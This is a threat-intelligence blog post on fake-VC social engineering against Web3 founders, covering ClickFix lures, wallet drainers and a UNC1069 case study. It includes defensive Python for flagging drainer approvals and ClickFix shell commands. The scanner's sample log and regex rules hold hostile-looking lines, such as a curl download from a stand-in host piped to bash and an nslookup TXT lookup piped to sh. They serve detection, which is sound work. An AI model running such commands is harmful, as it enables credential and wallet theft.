
    Counterparty Risk in Web3 Fundraising: The Threat Landscape

    Part 1 of this series introduced the Polity Web3 Investor Actor Classification – a structured decision tool for assessing counterparties along two dimensions: identity assurance and behavioural intent.

    This instalment supplies the threat intelligence that informs its application: the anatomy of modern impersonation campaigns, the social-engineering tactics that sustain them, and a detailed case study of a state-sponsored intrusion.

    Anatomy of the Modern VC Impersonator

    Today’s VC impersonators operate with the precision of a professional services firm.

    They are typically organised cybercriminal groups, some acting as Initial Access Brokers who specialise in gaining a foothold in a company’s infrastructure before executing a drainer script or selling the access onward.

    In February 2026, Mandiant published findings (1) attributing a sophisticated crypto-sector intrusion to UNC1069, a financially motivated threat actor with a suspected DPRK nexus tracked since 2018. Moonlock Lab’s independent investigation in early March 2026 (2) confirmed that fabricated VC identities – including “SolidBit Capital”, “MegaBit”, and “Lumax Capital” – are central to this campaign, corroborating a pattern first publicly documented by a victim on X in January 2026.

    The Corporate Façade

    These groups go well beyond impersonating individuals – they build shadow firms.

    They create websites for fictitious entities that look more polished than many legitimate funds, complete with fabricated team histories, portfolios stolen from real VCs, and functional “investor portals”. They frequently purchase aged LinkedIn accounts and X profiles to simulate years of industry presence.

    The Multi-Channel Role Play

    A typical operation follows a three-act structure.

    First, a “Scout” (posing as a junior analyst) reaches out on LinkedIn or X with highly personalised flattery, referencing the target’s whitepaper or a recent technical update.

    Once the founder is engaged, they are “escalated” to a “Principal” – a senior partner persona that may use AI voice cloning or deepfake video during short, choppy calls to establish authority.

    Finally, an “Engineer” introduces a technical requirement, such as a proprietary due-diligence tool or “secure meeting plugin”, which serves as the payload delivery mechanism.

    Social Engineering Tactics in 2026

    Identifying these actors is only half the picture; what makes them dangerous is how they make first contact and sustain the deception.

    The hallmark of a 2026 VC impersonation campaign is extreme personalisation.

    These campaigns target individual founders through prolonged social engineering rather than mass phishing, often investing weeks or even months in building a single relationship before attempting compromise.

    The LinkedIn Flattery Loop

    Attackers use AI scrapers to identify founders who have recently posted about a successful round or product launch. They send connection requests with notes such as “Enjoyed your thesis on modularity – we’re looking to deploy $2M into the infra space; would love to sync.”

    Because founders are conditioned to network, these requests have high acceptance rates.

    Once connected, the attacker warms the lead for days with legitimate-sounding questions about the technology stack before making a move.

    The Proprietary Meeting Pivot

    The most dangerous phase occurs when the attacker moves the conversation off-platform, suggesting a “secure” or “investor-only” version of Zoom or Google Meet, claiming it is used for compliance and encrypted deal-flow discussions.

    This is almost always a precursor to a ClickFix attack: the target receives a link to a landing page that mimics a meeting invite. When they click “Join”, the page simulates a browser error (e.g., “Microphone not found”) and prompts them to “fix it” by running a terminal command – the malicious payload.

    The Fake Due-Diligence Portal

    Another common approach involves a counterfeit investor portal. The target is asked to upload a pitch deck and then “verify traction” by connecting a wallet.

    The dashboard is a drainer: the connection request may appear “read-only”, but the transaction it then asks the victim to confirm calls setApprovalForAll, or the message it asks them to sign is a permit – either of which silently grants the attacker standing authority to transfer the victim’s assets.
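A wallet-side review of what a “connect and verify traction” flow actually asks the user to authorise makes the distinction between a read-only connection and a drainer concrete. The checker below is an added example written for this article, not Polity’s code or any wallet’s code. It inspects the JSON-RPC requests a dapp sends to a wallet and flags the two things the passage describes: an `eth_sendTransaction` whose calldata is `setApprovalForAll(operator, true)` (or an `approve`/ERC-2612 `permit` call), and an `eth_signTypedData_v4` request whose primary type is a permit. The four-byte selectors are the standard ones for those function signatures; the requests, addresses and operator are constructed sample data.

```python
import json
from dataclasses import dataclass

# Standard 4-byte selectors (first 4 bytes of keccak256 of the signature).
SELECTORS = {
    "a22cb465": "setApprovalForAll(address,bool)",
    "095ea7b3": "approve(address,uint256)",
    "d505accf": "permit(address,address,uint256,uint256,uint8,bytes32,bytes32)",
}
# EIP-712 primary types that grant a spender token authority off-chain.
PERMIT_PRIMARY_TYPES = {"Permit", "PermitSingle", "PermitBatch", "PermitTransferFrom"}
UNLIMITED = 2**256 - 1


@dataclass
class Verdict:
    method: str
    risk: str    # "approval" | "blind-signature" | "value-transfer" | "review" | "benign"
    detail: str


def _word(data_hex: str, i: int) -> str:
    """i-th 32-byte ABI word following the selector (64 hex chars)."""
    start = 8 + 64 * i
    return data_hex[start:start + 64]


def assess(request: dict) -> Verdict:
    """Classify one wallet JSON-RPC request by the authority it would grant."""
    method = request.get("method", "")
    params = request.get("params", [])
    if method == "eth_sendTransaction":
        tx = params[0]
        data = tx.get("data", "0x")[2:].lower()
        sel = data[:8]
        if sel == "a22cb465":
            operator = "0x" + _word(data, 0)[24:]
            if int(_word(data, 1) or "0", 16) != 0:
                return Verdict(method, "approval",
                               f"setApprovalForAll: {operator} may move every token in {tx.get('to')}")
            return Verdict(method, "benign", f"setApprovalForAll revoke for {operator}")
        if sel == "095ea7b3":
            spender = "0x" + _word(data, 0)[24:]
            amount = int(_word(data, 1) or "0", 16)
            scope = "UNLIMITED" if amount == UNLIMITED else str(amount)
            return Verdict(method, "approval", f"approve: spender {spender}, allowance {scope}")
        if sel in SELECTORS:
            return Verdict(method, "approval", SELECTORS[sel])
        if int(tx.get("value", "0x0"), 16) > 0:
            eth = int(tx["value"], 16) / 10**18
            return Verdict(method, "value-transfer", f"sends {eth} ETH to {tx.get('to')}")
        if data:
            return Verdict(method, "review", f"unknown selector 0x{sel} to {tx.get('to')}")
        return Verdict(method, "benign", "empty transaction")
    if method in ("eth_signTypedData", "eth_signTypedData_v3", "eth_signTypedData_v4"):
        typed = params[1] if len(params) > 1 else {}
        if isinstance(typed, str):
            typed = json.loads(typed)
        primary = typed.get("primaryType")
        if primary in PERMIT_PRIMARY_TYPES:
            msg = typed.get("message", {})
            value = str(msg.get("value", msg.get("amount", "")))
            scope = "UNLIMITED" if value == str(UNLIMITED) else value
            return Verdict(method, "approval",
                           f"off-chain {primary}: spender {msg.get('spender')}, value {scope}")
        return Verdict(method, "benign", f"typed data, primaryType={primary}")
    if method == "eth_sign":
        # Raw 32-byte hash signing: the wallet cannot show what is being authorised.
        return Verdict(method, "blind-signature", "raw hash signing request")
    return Verdict(method, "benign", "no authority granted")


def review_all(requests: list) -> list:
    return [assess(r) for r in requests]


# Constructed sample flow from a fake "due-diligence portal"; none of these are real addresses.
OPERATOR = "1234567890abcdef1234567890abcdef12345678"
VICTIM = "0x" + "a" * 40
NFT_CONTRACT = "0x" + "b" * 40
REQUESTS = [
    {"method": "eth_requestAccounts", "params": []},                       # the "read-only" connect
    {"method": "eth_sendTransaction", "params": [{
        "from": VICTIM, "to": NFT_CONTRACT, "value": "0x0",
        "data": "0xa22cb465" + OPERATOR.rjust(64, "0") + "1".rjust(64, "0")}]},
    {"method": "eth_signTypedData_v4", "params": [VICTIM, json.dumps({
        "primaryType": "Permit", "domain": {"name": "Sample Token", "chainId": 1},
        "message": {"owner": VICTIM, "spender": "0x" + OPERATOR,
                    "value": str(UNLIMITED), "nonce": 0, "deadline": 4102444800}})]},
    {"method": "personal_sign", "params": ["0x4c6f67696e206e6f6e63653a2031323334", VICTIM]},
    {"method": "eth_sendTransaction", "params": [{
        "from": VICTIM, "to": "0x" + "c" * 40, "value": "0xde0b6b3a7640000", "data": "0x"}]},
]

if __name__ == "__main__":
    for v in review_all(REQUESTS):
        print(f"{v.risk:15} {v.method:22} {v.detail}")
```

The useful property is that the verdict is derived from the calldata or typed-data message itself, not from what the portal’s UI says the action is: the “verify traction” step in the sample flow is flagged as an approval granting an operator control of every token in the contract, and the permit signature is flagged as an unlimited off-chain allowance, while the initial connect and the login signature pass.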

    The Technical Payload: ClickFix and Infostealers

    The “ClickFix” mechanism – sometimes called “living-off-the-user” – is currently the leading infection vector in crypto-targeted social engineering campaigns (2).

    Unlike traditional drive-by downloads, ClickFix attacks require the victim to manually execute the malicious payload, thereby bypassing endpoint security tools entirely.

    The CyberProof January 2026 analysis (3) confirmed that the latest variant targets cryptocurrency wallets including MetaMask, Exodus, and Trust Wallet, while simultaneously harvesting credentials from over 25 browsers. Microsoft subsequently disclosed a DNS-based ClickFix variant using nslookup for payload staging (4).

    The technical execution: when the victim lands on the spoofed meeting page, a script detects the operating system and displays a professional-looking prompt: “To join the secure call, please update your browser’s WebRTC component.”

    The victim copies and executes a terminal command that launches a payload performing session hijacking (scraping saved passwords and active session cookies), key scraping (searching for private-key files in local directories), and persistence installation (a backdoor that survives reboot).
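The detection side of both the Proprietary Meeting Pivot and the ClickFix payload described above is the moment the victim pastes a command into a terminal: that command has to fetch or decode something and hand it to a shell, and that shape is visible in process-execution or shell-history telemetry. The scanner below is an added example, not code from this article’s sources or from any EDR product. It runs a small set of heuristic rules over constructed tab-separated log lines (timestamp, user, command); the rules encode common ClickFix shapes (download piped to a shell, base64 decode piped to a shell, `nslookup` TXT lookups chained into execution as an assumed form of the DNS-staging variant, macOS quarantine stripping, hidden encoded PowerShell) and are a starting point to tune, not a complete signature set.

```python
import re
from dataclasses import dataclass, field

# Heuristic rule set written for this example: name -> pattern over the executed command line.
RULES = [
    ("download-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    ("decode-to-shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    ("eval-of-decoded",
     re.compile(r"\beval\b.*base64")),
    ("dns-txt-staging",  # assumed shape of a TXT-record payload stage chained into a shell
     re.compile(r"\bnslookup\b.*(-type=txt|-q=txt|-querytype=txt).*\|\s*(sudo\s+)?(ba|z|)sh\b", re.I)),
    ("applescript-shell",
     re.compile(r"osascript\s+-e\s+.*do shell script", re.I)),
    ("quarantine-strip",
     re.compile(r"xattr\s+(-d|-r\s+-d|-rd|-dr)\s+com\.apple\.quarantine")),
    ("powershell-hidden-encoded",
     re.compile(r"powershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b)", re.I)),
    ("mshta-remote",
     re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
]


@dataclass
class Finding:
    timestamp: str
    user: str
    command: str
    rules: list = field(default_factory=list)


def is_suspicious(command: str) -> list:
    """Return the names of every rule the command line matches (empty list if none)."""
    return [name for name, pattern in RULES if pattern.search(command)]


def scan(log_text: str) -> list:
    """Parse 'timestamp<TAB>user<TAB>command' lines and return one Finding per flagged line."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # malformed line; skip rather than guess
        ts, user, cmd = parts
        hits = is_suspicious(cmd)
        if hits:
            findings.append(Finding(ts, user, cmd, hits))
    return findings


# Constructed telemetry: a founder's normal activity followed by a ClickFix-style paste.
LOG = (
    "2026-03-09T10:14:02Z\talice\tgit pull origin main\n"
    "2026-03-09T10:15:31Z\talice\tbrew install node\n"
    "2026-03-09T10:22:47Z\talice\tcurl -fsSL https://meet-secure.example/fix-webrtc.sh | bash\n"
    "2026-03-09T10:23:05Z\talice\techo aGVsbG8= | base64 -d | sh\n"
    "2026-03-09T10:24:10Z\talice\tnslookup -type=txt update.example | sh\n"
    "2026-03-09T10:25:40Z\talice\txattr -d com.apple.quarantine ~/Downloads/ZoomSecure.app\n"
    "2026-03-09T10:26:00Z\talice\tnslookup example.com\n"
)

if __name__ == "__main__":
    for f in scan(LOG):
        print(f"{f.timestamp} {f.user}: {', '.join(f.rules)} :: {f.command}")
```

Two design points matter here. The rules look for the pipeline shape (fetch or decode, then execute) rather than a particular domain or file name, because the landing page and script name change per campaign while the shape does not. And the plain `nslookup example.com` and `brew install` lines pass, which is the false-positive check any such rule needs before it is wired to an alert.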

    Case Study: The UNC1069 Intrusion (Mandiant, February 2026)

    In a documented incident investigated by Mandiant (1), a FinTech entity in the cryptocurrency sector was targeted by UNC1069. The attacker contacted the victim via a compromised Telegram account belonging to an executive at a legitimate cryptocurrency company, building rapport over several days before sharing a Calendly link that redirected to a spoofed Zoom page hosted on attacker-controlled infrastructure.

    During the fake video call, the attacker deployed an AI-generated deepfake of a known CEO and simulated an audio issue to justify requesting the victim to run terminal commands. Mandiant’s forensic analysis recovered seven distinct malware families from the compromised host, including the DPRK-associated downloader SUGARLOADER and six newly identified families (WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, and CHROMEPUSH).

    The DEEPBREATH data miner manipulated macOS privacy controls to gain broad file-system access, enabling theft of browser credentials, wallet data, and identity documents.

    Key lesson: the length of social-engineering engagement is not proof of legitimacy. Under the Polity Web3 Investor Actor Classification, the UNC1069 operation is a textbook A-5 (Fraudulent Impersonator): fabricated identity, deepfake presentation, and malicious payload delivery. Had the F-DD Protocol been applied, Step 2 (back-channel verification via the real firm) would have exposed the fabrication before any technical compromise occurred.

    If a counterparty insists on proprietary meeting software, asks you to run terminal commands, or resists moving to your own video-conferencing platform, disengage immediately.

    Next week: Part 3 sets out the operational controls that underpin the classification framework – treasury segmentation, identity and access management, incident response, and the strategic case for treating counterparty governance as infrastructure.


    About Polity

    The Web3 Investor Actor Classification presented in this series is the first of several governance primitives being developed as part of the Polity governance model. Polity builds infrastructure for regulated digital finance. Its governance frameworks are designed to bridge decentralised systems and institutional-grade compliance requirements, with a focus on GDPR, eIDAS 2.0, DORA, and MiCA alignment across European and international markets.

    Disclaimer: This article is published for informational and educational purposes only. It does not constitute investment advice, legal advice, or an endorsement of any product, service, or security practice. Polity does not provide investment advice, custody services, or regulated crypto-asset activities. Readers should conduct their own due diligence and consult qualified professionals before making any decisions based on the content of this publication. All third-party sources are cited for reference; their inclusion does not imply endorsement by or affiliation with Polity.

    References

    (1) Mandiant / Google Threat Intelligence Group (2026). ‘UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering.’ Google Cloud Blog. Available at: https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering (Accessed: 9 March 2026).

    (2) Moonlock Lab (2026). ‘Fake VCs Target Crypto Talent in a New ClickFix Campaign.’ Moonlock. Available at: https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign (Accessed: 9 March 2026).

    (3) CyberProof (2026). ‘Fake CAPTCHA Attack Uncovered: ClickFix Infostealer Campaign.’ CyberProof Research. Available at: https://www.cyberproof.com/blog/fake-captcha-attack-uncovered-clickfix-infostealer-campaign/ (Accessed: 9 March 2026).

    (4) Microsoft Threat Intelligence (2026). ‘DNS-Based ClickFix Attack Using Nslookup for Malware Staging.’ Reported via The Hacker News. Available at: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html (Accessed: 9 March 2026).
